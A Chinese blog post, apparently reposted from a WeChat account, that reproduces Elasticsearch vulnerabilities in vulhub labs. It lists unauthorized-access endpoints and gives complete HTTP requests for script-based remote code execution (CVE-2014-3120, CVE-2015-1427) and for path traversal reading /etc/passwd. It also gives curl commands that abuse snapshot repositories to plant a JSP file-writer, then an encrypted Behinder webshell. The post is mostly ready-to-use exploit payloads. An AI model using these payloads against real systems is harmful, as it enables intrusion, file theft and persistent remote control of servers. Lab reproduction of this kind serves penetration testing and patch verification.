Elasticsearch漏洞集合

  • A+
所属分类:安全文章


本文复现环境都是来自vulhub,复现这个原因是在攻防演练中遇到Elasticsearch相对来说还是较多的。以下复现语言简洁,从word里面复制出来的图片较模糊


1.未授权访问获取敏感信息

/_cat/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status

Elasticsearch漏洞集合

2.CVE-2014-3120远程代码执行

    访问环境

Elasticsearch漏洞集合

    提交数据包,创建一条数据

POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22
{ "name": "test"}

Elasticsearch漏洞集合

    创建成功之后,就可以执行代码了

POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 356
{ "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();" } }}

Elasticsearch漏洞集合

    反弹shell需进行编码

http://www.jackson-t.ca/runtime-exec-payloads.html

Elasticsearch漏洞集合

3.CVE-2015-1427远程代码执行


    访问环境

Elasticsearch漏洞集合

    发送POST数据包,创建一个数据

POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22
{ "name": "test"}

Elasticsearch漏洞集合

    创建成功,然后执行代码

POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156
{"size":1"script_fields": {"lupin":{"lang":"groovy","script""java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()"}}}

Elasticsearch漏洞集合

进行编码,反弹shell

Elasticsearch漏洞集合

4.目录穿越CVE-2015-3337

    访问环境

Elasticsearch漏洞集合

/_cat/plugins:查看所有已安装的插件

Elasticsearch漏洞集合

Elasticsearch漏洞集合

需使用burp发包访问,浏览器验证不了

GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Elasticsearch漏洞集合

5.目录穿越CVE-2015-5531

    访问环境

Elasticsearch漏洞集合

使用PUT请求,创建一个仓库

PUT /_snapshot/test HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 108
{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" }}

Elasticsearch漏洞集合

使用同样方法创建一个快照

PUT /_snapshot/test2 HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 126
{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" }}

Elasticsearch漏洞集合

访问

http://192.168.100.180:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Elasticsearch漏洞集合

需要解码,在控制台可以输入String.fromCharCode(里面就是这些数字)

Elasticsearch漏洞集合

6.Elasticsearch写入webshell漏洞

    访问环境

Elasticsearch漏洞集合

写入webshell前提你得知道网站路径

首先创建一个恶意索引文档

终端执行

curl -XPOST http://192.168.100.180:9200/yz.jsp/yz.jsp/1 -d '{"<%newjava.io.RandomAccessFile(application.getRealPath(new String(newbyte[]{47,116,101,115,116,46,106,115,112})),new String(newbyte[]{114,119})).write(request.getParameter(new String(newbyte[]{102})).getBytes());%>":"test"}'

Elasticsearch漏洞集合

载创建一个恶意的存储库

curl -XPUT 'http://192.168.100.180:9200/_snapshot/yz.jsp' -d '{ "type":"fs", "settings": { "location":"/usr/local/tomcat/webapps/wwwroot/", "compress": false }}'

Elasticsearch漏洞集合

存储库验证并创建

curl -XPUT "http://192.168.100.180:9200/_snapshot/yz.jsp/yz.jsp" -d '{     "indices": "yz.jsp",     "ignore_unavailable": "true",     "include_global_state": false}'

Elasticsearch漏洞集合

访问8080端口,验证文件是否可以访问

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp

Elasticsearch漏洞集合

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,参数为f

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e

写入webshell,需进行url编码,不然不会成功的

http://192.168.100.180:8080/wwwroot/test.jsp

Elasticsearch漏洞集合

可以看见已经写入进去了,使用冰蝎连接

Elasticsearch漏洞集合



本文始发于微信公众号(MrLee 小师父):Elasticsearch漏洞集合

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: